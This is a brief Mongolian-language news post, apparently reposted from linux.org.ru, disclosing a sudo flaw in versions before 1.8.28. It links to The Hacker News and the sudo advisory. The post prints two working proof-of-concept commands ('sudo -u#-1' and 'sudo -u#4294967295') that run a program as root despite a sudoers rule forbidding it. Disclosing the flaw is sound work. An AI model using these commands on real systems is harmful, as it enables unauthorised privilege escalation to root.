Sudo дахь эмзэг байдал

Sudo дахь алдаа нь /etc/sudoers нь бусад хэрэглэгчдэд ажиллуулахыг зөвшөөрч, root-д ашиглахыг хориглосон тохиолдолд ямар ч гүйцэтгэгдэх файлыг root хэлбэрээр ажиллуулах боломжийг олгодог.

Алдааг ашиглах нь маш энгийн:

sudo -u#-1 id -u

эсвэл:

sudo -u#4294967295 id -u

Алдаа нь 1.8.28-аас өмнөх sudo-ийн бүх хувилбаруудад байдаг

Дэлгэрэнгүй мэдээлэл:

https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html


https://www.sudo.ws/alerts/minus_1_uid.html

Эх сурвалж: linux.org.ru

сэтгэгдэл нэмэх